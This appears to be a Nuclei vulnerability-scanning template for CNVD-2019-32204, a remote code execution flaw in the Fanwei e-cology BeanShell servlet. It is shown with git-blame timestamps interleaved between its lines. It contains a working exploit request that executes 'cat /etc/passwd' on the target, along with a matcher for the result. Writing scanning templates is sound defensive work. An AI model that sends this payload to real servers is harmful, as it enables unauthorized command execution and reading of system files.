2022-05-06 20:10:15 +00:00
id : CNVD-2019-32204
# AAAAAAAA
2022-04-02 10:54:05 +00:00
info :
2022-05-06 20:10:15 +00:00
name : Fanwei e-cology <= 9.0 Remote Code Execution
2022-05-06 19:18:57 +00:00
author : daffainfo
severity : critical
2022-05-06 20:10:15 +00:00
description : The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
2022-04-22 10:38:41 +00:00
reference :
2022-05-06 20:10:15 +00:00
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
tags : fanwei,cnvd,cnvd2019,rce
2022-04-02 10:54:05 +00:00
requests :
2022-05-06 19:18:57 +00:00
- raw :
- |
2022-05-06 20:10:15 +00:00
POST /bsh.servlet.BshServlet HTTP/1.1
2022-05-06 19:18:57 +00:00
Host : {{Hostname}}
2022-05-06 20:10:15 +00:00
Content-Type : application/x-www-form-urlencoded
2022-04-06 04:00:14 +00:00
2022-05-06 20:10:15 +00:00
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
2022-05-06 19:18:57 +00:00
2022-04-02 10:54:05 +00:00
matchers :
2022-05-06 20:10:15 +00:00
- type : regex
regex :
- "root:.*:0:0:"
2022-04-06 04:00:14 +00:00
2022-05-06 19:18:57 +00:00
# Enhanced by cs on 2022/05/06